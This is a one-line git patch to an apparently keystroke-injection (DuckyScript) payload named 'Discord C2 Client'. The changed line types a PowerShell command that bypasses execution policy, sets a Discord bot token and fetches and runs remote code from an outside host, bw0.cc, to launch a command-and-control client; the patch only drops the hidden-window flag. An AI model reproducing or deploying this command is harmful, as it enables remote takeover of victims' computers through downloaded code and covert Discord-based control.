From 81a5f9847d12969381abfcdd94686e5f0813ef94 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 10:52:50 +0000 Subject: [PATCH] Update Discord C2 Client.txt --- Discord-C2/Discord C2 Client.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Discord-C2/Discord C2 Client.txt b/Discord-C2/Discord C2 Client.txt index aaea0ab..10958d8 100644 --- a/Discord-C2/Discord C2 Client.txt +++ b/Discord-C2/Discord C2 Client.txt @@ -17,6 +17,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcc2) +STRING powershell -Ep Bypass -C $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcc2) ENTER